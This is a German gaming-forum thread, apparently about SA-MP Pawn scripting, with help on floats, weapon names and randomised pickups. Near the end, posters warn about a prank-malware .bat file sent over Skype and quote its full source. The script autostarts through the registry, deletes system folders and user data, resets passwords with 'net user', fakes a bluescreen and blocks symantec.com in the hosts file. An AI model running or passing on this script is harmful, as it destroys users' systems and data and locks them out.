Ein deutscher Cops and Robbers Server wäre mal geil. Gibts, soweit ich weiß, keinen. Falls doch, bitte die IP .
Gruß,
Neo.
Ein deutscher Cops and Robbers Server wäre mal geil. Gibts, soweit ich weiß, keinen. Falls doch, bitte die IP .
Gruß,
Neo.
Der Fehler kommt, wenn du versuchst das ganze mit Floats zu machen.
Du musst vFahrzeug[vehicleid][Kilometer] erst in einen Integer umwandeln, da das ganze nicht mit Floats geht.
Ich glaube, dass das der Rest ist, wenn man durch die Zahl (in dem Fall 1000) teilt. Würde auf jedenfall Sinn machen, da eine Kommazahl ausgegeben werden soll. (z.B. 50.5 KM)
Achso, na wenn du das bei Death machst ist das natürlich kein Problem mit der Funktion.
Wenn du aus dem "killername" bei dem SetString noch ein "killerwaffe" machst, sollte das eigentlich gehen.
Benutz GetWeaponName(weaponid);
Du musst dann trotz allem die Funktion GetPlayerWeapon benutzen. Benutzt er die Funktion GetWeaponName hat er mehr (zwar nicht viel, aber mehr) Ressourcenverbrauch als nur mit der GetPlayerWeapon.
Mir fällt dafür keine einfachere Methode ein. - Falls es eine gibt.
Pack das einfach in einen Stock, und ruf es auf, wenn du es brauchst. Sollte nicht soo viel an Ressourcen fressen.
switch(GetPlayerWeapon(playerid))
{
case 0: // Faust
{
// Textdraw Updaten
}
case 1: // Schlagring
{
// Textdraw Updaten
}
}
So?
Nein gibt es nicht.
Hättest du aber gegoogelt, dann wüsstest du, dass es trotzdem Möglichkeiten gibt.
http://www.macintosh-forum.de/…ac-os-x-installieren.html
Das bringt uns aber schon mal weiter.
Das bedeutet, dass er die ID nicht richtig setzt.
Wie hast du wantedstern definiert?
Versuch mal ein par prints einzubauen.
Sprich:
if(pickupid==wantedstern[0])
{
print("1");
if(GetPlayerWantedLevel(playerid)>=1)
{
print("2");
for(new i = 0; i < MAX_PLAYERS; i++)
{
printf("i,%i"i);
if(GetPVarInt(i,"Fraktion")==3 || GetPVarInt(i,"Fraktion")==5 || GetPVarInt(i,"Fraktion")==13)
{
new string[128];
format(string,sizeof(string),"%s hat einen Wantedstern gefunden!",SpielerName(playerid));
SendClientMessage(i,COLOR_LIGHTGREEN,string);
}
return 1;
}
print("3");
SetPlayerWantedLevel(playerid,GetPlayerWantedLevel(playerid)-1);
SpielerSpeichern(playerid);
DestroyPickup(wantedstern[0]);
}
print("4");
return 1;
}
Wenn du nun durch dieses durchläufst müsste er dir was in die Console schreiben. Was schreibt er dir?
Versuch das ganze mal mit dem Pickuptyp 2 "Pickupable, respawns after some time.".
Dann zerstörst du aber in OnPlayerPickupPickUp das Pickup, falls es jemand aufhebt.
switch(pickupid)
{
case(wantedstern[0]):
{
// Code Code Code
// Code Code Code
DestroyPickup(wantedstern[0]);
return 1;
}
}
Funktioniert der Timer auch, der alle respawnen soll?
Soll der Stern denn nach dem aufheben verschwinden? - Wenn ja, für immer oder nur kurz?
Wo genau crasht er?
Mach mal ein par Tests rein.
print("test1");
//code
print("test2");
und so weiter.
Ich möchte es haben, sieht mega aus. O:
Gruß,
Neo. :3
Na das erste Problem war ja, dass nur ein Stern erstellt wird. Funktioniert es denn so, dass mehr erstellt werden?
Problem an der Sache ist, dass der PickUp Type 1 nicht PickupAble ist. Das bedeutet, du musst dort mit einem Timer arbeiten.
Erstelle einen Timer, mit ~1,5 sekunden interval, repeatable (Bei connect, Parameter playerid)
Überprüfe seine Position und vergleich sie mit den Pickups
Falls er in der Range ist(so etwa 3-5) führen den Code auf OnPlayerPickUpPickup aus (ab if(GetPlayerWantedLevel) ..)
Falls nicht, returnen.
Gruß,
Neo.
Das liegt daran, dass bei:
new zufall = random(sizeof(Sterne));
eine Random Zahl ausgesucht wird, und diese dann in Zufall gespeichert wird. Sie verändert sich nicht, wenn man die Variable Zufall noch mal verwendet.
Sprich:
Du erstellst zwar 6, aber 6 mal die gleichen Koordinaten.
Gruß,
Neo.
new zufall = random(sizeof(Sterne));
wantedstern[0] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
zufall = random(sizeof(Sterne));
wantedstern[1] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
zufall = random(sizeof(Sterne));
wantedstern[2] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
zufall = random(sizeof(Sterne));
wantedstern[3] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
zufall = random(sizeof(Sterne));
wantedstern[4] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
zufall = random(sizeof(Sterne));
wantedstern[5] = CreatePickup(1247,1,Sterne[zufall][0],Sterne[zufall][1],Sterne[zufall][2]);
Zwar nicht das beste, aber so sollte es gehen. (Du solltest aber noch schauen, dass man nicht 2 mal das gleiche bekommen kann.)
Quelltext klau ist das Poster, dafuer kann man so lange Haft wie ein Kinderschaender. Die .bat benötigt aber Adminrechte oder?
Wir wissen aber nicht, ob er sie mit Adminrechten gestartet hat, oder nicht. Ja, dafür benötigt sie Adminrechte.
Naja.. Wenn ihr euch den Quellcode mal anschaut. Das ist genau das, was er ihm als batch geschickt hat. Und da steht schon drin, dass sein System gelöscht wird. Möchte das jetzt nicht testen, aber es sieht ganz so aus.
Schau vielleicht mal, ob die Ordner:
C:\windows\system32
C:\Windows\System32
C:\WINDOWS\SYSTEM32
C:\Program Files
C:\Program Files (x86)
C:\Windows\Cursors
C:\Windows\system
noch da sind. Falls nicht, dann mach einen Screen von der Konversation und zeig ihn an, denn dann hat er dein Windoof kaputt gemacht.
msg * So noch einen 08/15 Server will niemand ;) Dein PC ist jetzt im Arsch!
Start
reg add
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v test /t reg_sz /d C:\Users\kai\Downloads\GF SCRIPT.bat
copy %0 %windir%\system32\ls.bat
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start
start
start
start
start
start
start
start
start
start
start
del C:\windows\system32
del C:\Windows\System32
del C:\WINDOWS\SYSTEM32
del C:\Program Files
del C:\Program Files (x86)
del C:\Windows\Cursors
del C:\Windows\system
start C:\Users
del C:\Users
net user %username% lol
net user Administrator lol
Del C:\Program Files\Mozilla Firefox\firefox.exe
Del C:\Windows\regedit.exe
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause :nul
cls
echo Downloading viruses . . .
ping localhost -n 5 :nul
dir
pause :nul
cmd /c echo 127.0.0.1 www.symantec.com>>c:\windows\system32\Drivers..
Alles anzeigen
Hier der Quellcode von dem Müll. Löscht ihn am besten alle in Skype. Er macht nur scheiße.
9/10 Brotfischies.
Es ist sehr gut, aber nicht ganz perfekt.
Im Wartezimmer sieht es etwas leer aus. Dort könnte man vielleicht noch einen oder zwei Tische oder so etwas mit rein bringen.
Gruß,
Neo.